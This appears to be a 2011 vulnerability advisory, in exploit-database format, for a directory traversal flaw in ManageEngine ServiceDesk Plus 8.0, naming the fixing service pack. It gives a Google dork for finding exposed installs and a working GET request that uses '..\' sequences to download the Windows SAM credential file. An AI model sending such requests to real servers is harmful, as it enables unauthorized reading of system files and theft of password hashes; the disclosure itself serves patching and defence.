ManageEngine ServiceDesk Plus 8.0 - Directory Traversal

Author: Keith Lee
type: webapps
platform: jsp
port: 
date_added: 2011-06-23 
date_updated: 2011-07-24 
verified: 1 
codes: OSVDB-73310;CVE-2011-2757;CVE-2011-2755 
tags: 
aliases:  
screenshot_url:  
application_url: 

Google Dork:	ie: intitle:ManageEngine ServiceDesk Plus"
Author:		Keith Lee (keith.lee2012@gmail.com), @keith55,
http://milo2012.wordpress.com
Software Link:	http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe
Version:	8.0

Description:

Directory traversal vulnerabilities has been found in ManageEngine
ServiceDesk Plus 8.0 a web
based helpdesk system written in Java.

The vulnerability can be exploited to access local files by entering
special characters in variables used to create file paths. The attackers
use �../� sequences to move up to root directory, thus permitting
navigation through the file system.

Request:
GET http://[webserver
IP]:8080/workorder/FileDownload.jsp?module=agent&&FILENAME=%20..\..\..\..\..\..\..\..\..\windows\repair\SAM

The issue is fixed with Service Pack Build 8012 found in the below link.
http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus_8_0_0_SP-0_12_0.ppm


--
Keith

Blog: http://www.milo2012.wordpress.com
Twitter: @keith55